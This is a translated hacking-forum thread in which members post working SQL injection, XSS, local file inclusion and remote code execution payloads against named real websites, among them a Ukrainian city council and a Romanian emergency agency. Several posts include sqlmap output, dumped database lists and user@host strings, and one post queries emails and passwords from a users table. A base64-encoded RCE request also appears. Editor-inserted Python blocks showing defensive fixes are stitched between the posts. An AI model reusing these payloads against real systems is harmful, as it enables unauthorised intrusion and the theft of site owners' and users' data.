SQLi, XSS and other vulnerabilities.

Discussion in 'Песочница' (Sandbox) started by Егорыч+++, 10 May 2015.

  1. Vip77 (Elder)

    Code:
    https://www.edmunds.com/a/?":""});alert(document.cookie);//
    http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script>
    https://lyricstranslate.com/?page="><script>alert(7889789)</script>
    http://720pizle.com/ara.asp?a="><script>alert(7889789)</script>
    http://epinions.com/search/books/63715?"><script>alert(6456456)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script>
    http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script>
    http://www3.gogoanime.tv/"><script>alert(4389)</script>
    https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script>
    https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script>
    https://warframe.market/</script><script>alert(4389)</script>
    https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script>
    http://www.gazetevatan.com/Default.aspx?aType=';alert();//
    http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script>
    https://gamebanana.com/tools?"><script>alert(4389)</script>
    https://indosport.com/"><script>alert(4389)</script>
    http://brasilescola.uol.com.br/"><script>alert(4389)</script>
    https://watchasian.co/"><script>alert(4389)</script>
    http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script>
    http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script>
    https://eadaily.com/"><script>alert(00088)</script>
    http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script>
    http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>
    
     
    #301 Vip77, 23 Mar 2018
    Last edited: 23 Mar 2018
  2. Octavian (Member)

    https://forum.antichat.ru/threads/426171/page-6
    Already posted this.
     
  3. fiji (New Member)

    Code:
    http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
     
  4. lukeone (Member)

    Code:
    http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK
    Vector: AND MAKE_SET([INFERENCE],[RANDNUM])
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#
    Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    available databases [110]:
    [*] 1poverennaya.ru
    [*] 3dschool.akadem-art.ru
    [*] acmoda_fashion
    [*] akadem-art.ru
    [*] amsterdam.ru
    [*] amur-tiger
    [*] api.olit.su
    [*] apteki.ru
    [*] at
    [*] ayashiclimat
    [*] berendeevo
    [*] bitrix_55
    [*] cargoflies.ru
    [*] civlife
    [*] cookies
    [*] cpa
    [*] cpa-monsters.ru
    [*] crypto
    [*] cv79250_db
    [*] db1050525_rpfm
    [*] dev.check-car.io
    [*] dish.ru
    [*] docdoc
    [*] dojoy.ru
    [*] dreamwood
    [*] el-torg.ru
    [*] fefectu_fikcii
    [*] game4art.ru
    [*] gidrolica
    [*] greencontinent.bio
    [*] hockeyfamily
    [*] hostel
    [*] information_schema
    [*] informed
    [*] irasmarovoz
    [*] kordik-psyhelp
    [*] kz_health
    [*] lecture
    [*] led1080.ru
    [*] lesspas
    [*] light
    [*] lotmo
    [*] mailer
    [*] maxphoto
    [*] medelement.ru
    [*] messenger
    [*] metalnastil.ru
    [*] miel.ru
    [*] modelery
    [*] mototelega
    [*] mysql
    [*] nanokeratin-shop
    [*] new.olit.su
    [*] new_olit
    [*] newoleg
    [*] olit_su
    [*] olmatveeva.ru
    [*] pdns
    [*] performance_schema
    [*] photoluxor
    [*] picture
    [*] pineapple
    [*] powerdns
    [*] prazdnik
    [*] pressnastil.ru
    [*] profdoctors.ru
    [*] push
    [*] radio.ru
    [*] recraft.ru-yii
    [*] redmine
    [*] rekomendacii
    [*] remcraft.ru
    [*] remcraft.ru-new
    [*] remcraft.ru-new1!!
    [*] resthistory
    [*] rlogistika
    [*] seobirds
    [*] seorakerus
    [*] seowant.ru
    [*] sflegaladvice
    [*] siluet.su
    [*] sitemanager0
    [*] skld
    [*] social
    [*] sound_olit
    [*] sound_olit_su
    [*] sport
    [*] spz-rus.ru
    [*] stroynastil.ru
    [*] stroynastil.ru1
    [*] sveng
    [*] telegramm
    [*] test
    [*] umgear.ru
    [*] union.ru
    [*] union.ru-old
    [*] vault-pdm.ru
    [*] velespro.com
    [*] videoportal
    [*] visagestyle
    [*] water-check.ru
    [*] wawtalk.io
    [*] webmonsters
    [*] whoknow.ru
    [*] yandex_bot
    [*] yiilab
    [*] ymga.ru
    [*] ymga.ru-new
    [*] zabbix
    [*] zaem-info.ru
     
  5. Franky_T (Level 8)

    Hello :)
    First day on the forum, I'll give it a try too.

    1. SQL injection with WAF bypass
    Code:
    GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
    Host: www.cdlmacapa.com.br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    2. SQL injection with error-based output
    Code:
    http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
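Added example (editor's code, not from the post or from any of the sites named above): the WAF bypass in request 1 relies on MySQL executing the body of a `/*!50000 ... */` version comment on any server at or above that version, while a filter that matches the literal text `union select` never sees the two keywords next to each other. The normalizer below URL-decodes, unwraps version comments and strips plain comments before applying the same rules. It is run over the query string of the posted request (host and headers dropped) together with a constructed un-obfuscated injection and a constructed benign request, so the difference between the naive and the normalized check is visible.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!NNNNN ... */ when its version is >= NNNNN, so the
# payload is live SQL for the server while a literal "union select" rule sees
# "union*/ /*!50000select". Unwrap such comments before keyword matching.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)),
    ("schema-read", re.compile(r"\binformation_schema\b", re.IGNORECASE)),
]

# Query string of the request in the post above (host and headers dropped),
# plus a constructed un-obfuscated injection and a constructed benign request.
POSTED = ("id=-738+/*!50000union*/+/*!50000select*/+111,222,"
          "/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,"
          "1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/"
          ".tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+")
PLAIN = "id=-738 union select 1,2,3 from information_schema.tables--"
BENIGN = "id=738&page=2"


def normalize(raw: str) -> str:
    """URL-decode, unwrap MySQL version comments, strip plain comments, fold whitespace."""
    text = unquote_plus(raw)
    prev = None
    while prev != text:          # repeat: unwrapping can expose further comments
        prev = text
        text = VERSION_COMMENT.sub(r" \1 ", text)
        text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def rules_hit(text: str) -> list:
    """Names of the rules that match the given (already decoded) text, in rule order."""
    return [name for name, rx in RULES if rx.search(text)]


def naive_check(raw: str) -> list:
    """What a filter that only URL-decodes sees."""
    return rules_hit(unquote_plus(raw))


def normalized_check(raw: str) -> list:
    """The same rules after comment normalization."""
    return rules_hit(normalize(raw))


if __name__ == "__main__":
    for label, req in (("posted", POSTED), ("plain", PLAIN), ("benign", BENIGN)):
        print(f"{label:7} naive={naive_check(req)} normalized={normalized_check(req)}")
```

The word-boundary anchors are what the obfuscation defeats: in the decoded raw request the keywords appear as `50000union` and `50000select`, so `\bunion\b` fails, while after unwrapping they are bare tokens again. Normalizing once and keeping the rules simple is cheaper than trying to enumerate every comment and case variant in the rules themselves.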
    
     
  6. Franky_T (Level 8)

    A bit more, now LFI.
    Code:
    http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774
    
    https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]
    
    http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd
    
    http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
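Added example (editor's code, not the code of any site above): the four requests in this post are the usual shapes a `?pagina=` / `?page=` include parameter has to survive: an absolute path, `../` traversal, a `php://filter` stream wrapper, and (constructed here) a URL-encoded variant. The resolver below refuses all of them and only serves a page that actually exists under a fixed directory, checking both lexically (`normpath`, wrapper and absolute-path rejection) and on the resolved real path (so a symlink inside the pages directory cannot point outside it). The pages directory, its single `about.php` and the sample parameter values are constructed inside the block.

```python
import os
import posixpath
import tempfile
from typing import Optional
from urllib.parse import unquote

# Constructed page parameters shaped like the requests in the post above,
# plus one legitimate page name. The directory and page file are created in demo().
SAMPLES = {
    "absolute": "/etc/passwd",
    "traversal": "../../../../../../../../../../../etc/passwd",
    "wrapper": "php://filter/convert.base64-encode/resource=/etc/passwd",
    "encoded": "..%2F..%2Fetc%2Fpasswd",
    "legit": "about",
}


def safe_page_path(base_dir: str, pagina: str) -> Optional[str]:
    """Map ?pagina= to a file under base_dir, or None if the request must be refused."""
    name = unquote(pagina)                      # decode once, as the web server already does
    if "://" in name or name.startswith("/") or "\\" in name or "\0" in name:
        return None                             # stream wrappers, absolute paths, NUL tricks
    norm = posixpath.normpath(name)             # lexical: collapses a/../b, keeps a leading ..
    if norm == ".." or norm.startswith("../") or norm in (".", ""):
        return None                             # anything that still climbs out is refused
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, norm + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None                             # symlink or other escape past base_dir
    return candidate if os.path.isfile(candidate) else None


def demo() -> dict:
    """Create a throwaway pages directory with one real page and classify SAMPLES."""
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "about.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php echo 'about'; ?>\n")
        return {label: safe_page_path(base, value) is not None
                for label, value in SAMPLES.items()}


if __name__ == "__main__":
    for label, allowed in demo().items():
        print(f"{label:10} {'served' if allowed else 'refused'}")
```

An allow-list of page names is stricter still and is the right fix where the set of includable pages is small; the resolver above is for the case where pages are files dropped into a directory. Decoding exactly once matters: decoding twice would let `%252e%252e%252f` through a check that runs before the second decode.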
    
    
     
    #306 Franky_T, 10 Nov 2018
    Last edited: 10 Nov 2018
  7. qwaszx000 (Member)

    Code:
    https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20
    
    r[email protected]
    5.5.62
    bible_history
     
  8. Егорыч+++ (Staff Member)

    It would all be fine, but it's googlable, and this bug looks like it's about two years old already.
     
  9. Numb (New Member)

  10. Numb (New Member)

    #310 Numb, 15 Feb 2019
    Last edited: 16 Feb 2019
  11. BenderMR (Member)

    SQLi:
    SoftwareOnRent
    Code:
    http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,concat_ws(0x7c,database(),%20user(),version()),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+&catid=1&compid=135

    SOR|[email protected]|5.5.56-MariaDB

    Code:
    http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,group_concat(column_name),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27--+&catid=1&compid=135
    SecurityDealOnline

    Code:
    http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat_ws(0x7c,database(),version()))))--+
    
    
    bluewings|[email protected]|5.6.39-cll-lve

    Code:
    http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20)))--+
    
    BrandTagz
    Code:
    http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20database(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts
    
    [brandtag|[email protected]|5.6.39-cll-lve]

    Code:
    http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat_ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts
    








     
  12. BenderMR (Member)

    Rcadia
    Code:
    http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19
    
    [email protected]|rcadia2|5.6.34-log

    City council, Cherkasy
    Code:
    http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+
    
    myrada|[email protected]|5.5.24-log

    Indian shop
    Code:
    https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
    

    myp13eyd_royal2|[email protected]|5.6.32-78.1

    Code:
    https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#
    



     
  13. RWD (Member)

    way.com
    Code:
    https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
    Parameter: pid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    

    Code:
    http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
     
    #313 RWD, 16 Mar 2019
    Last edited: 17 Mar 2019
  14. crlf (Green member)

    Code:
    https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net
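Added example (editor's code, not temp-mail.org's): the payload above works only because the `email` value lands inside a double-quoted attribute and the first `"` closes it, after which `/onfocus=... /autofocus=...` are parsed as new attributes (the browser treats `/` as an attribute separator, and `autofocus` fires the handler without a click). The hypothetical template below shows the raw interpolation beside the hardened version, and uses Python's own tokenizer-style parser (`html.parser`) to show which attributes each rendering actually produces. The form template and field names are assumptions; the input is the payload from the post.

```python
import html
from html.parser import HTMLParser

# The attribute-breakout payload from the post above, used as constructed input
# to a hypothetical search form template (not temp-mail.org's code).
PAYLOAD = '"/onfocus=\'alert`lul`\'/autofocus="@tmailcloud.net'


def render_unsafe(email: str) -> str:
    """Vulnerable: the parameter is interpolated raw into a quoted attribute."""
    return f'<input type="text" name="email" value="{email}">'


def render_safe(email: str) -> str:
    """Hardened: quote=True encodes both quote characters, so the value cannot
    close the attribute; < > & are encoded as well, which covers the text context."""
    return f'<input type="text" name="email" value="{html.escape(email, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collect the attribute dict of the first <input> the parser sees."""

    def __init__(self):
        super().__init__()
        self.found = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.found is None:
            self.found = dict(attrs)


def input_attributes(markup: str) -> dict:
    """Split the rendered tag into attributes the way a browser tokenizer would."""
    p = _InputAttrs()
    p.feed(markup)
    p.close()
    return p.found or {}


if __name__ == "__main__":
    print("unsafe:", input_attributes(render_unsafe(PAYLOAD)))
    print("safe:  ", input_attributes(render_safe(PAYLOAD)))
```

In the unsafe rendering `value` comes back empty and `onfocus` / `autofocus` appear as separate attributes; in the safe rendering there are exactly the three attributes the template wrote and `value` round-trips to the original string. Escaping must be chosen per context: this encoder is right for attribute and text content, but a value placed inside a `<script>` block or a URL needs JavaScript-string or URL encoding instead.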
    
     
  15. lifescore (Elder)

    rce (=

    шттп://www.t| u | torialspoint.com/



    Stat on similarweb =)




    PoC
    Code:
    from base64
    UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
    
     
    #315 lifescore, 4 Sep 2019
    Last edited: 25 Nov 2019
  16. Pop-Xlop (Member)

    ZoneAlarm
    Code:
    https://forums.zonealarm.com/ajax/render/widget_php
    POST:
    widgetConfig[code]=phpinfo();
    
     
  17. Octavian (Member)

    Blind XSS in the Hostinger admin panel, sorry for the Russian site
    https://crm.hostinger.io/client/29640132
    PS: Reported it, they said thanks and extended my hosting by one month
     
    #317 Octavian, 15 Feb 2020
    Last edited: 15 Feb 2020
  18. Octavian (Member)

    There's a carder who stole $36 million and served 10 years; he now has a YouTube channel, "Люди PRO", which I watch myself )
    He has his own cashback service in which, in about 5 minutes, I found a Server side template injection, though I couldn't get a payload to produce output (
    https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}.
    + XSS
    https://secretdiscounter.com/ru/"//><script>alert(5)</script>
     
    #318 Octavian, 25 Mar 2020
    Last edited: 25 Mar 2020
  19. sepo (Member)

    General Inspectorate for Emergency Situations


    Code:
    https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript%3Ealert(666)%3C/script%3E
     
  20. sepo (Member)

    Promotora Española de Lingüística (Proel)
    Code:
    http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&pagina=searchresult
     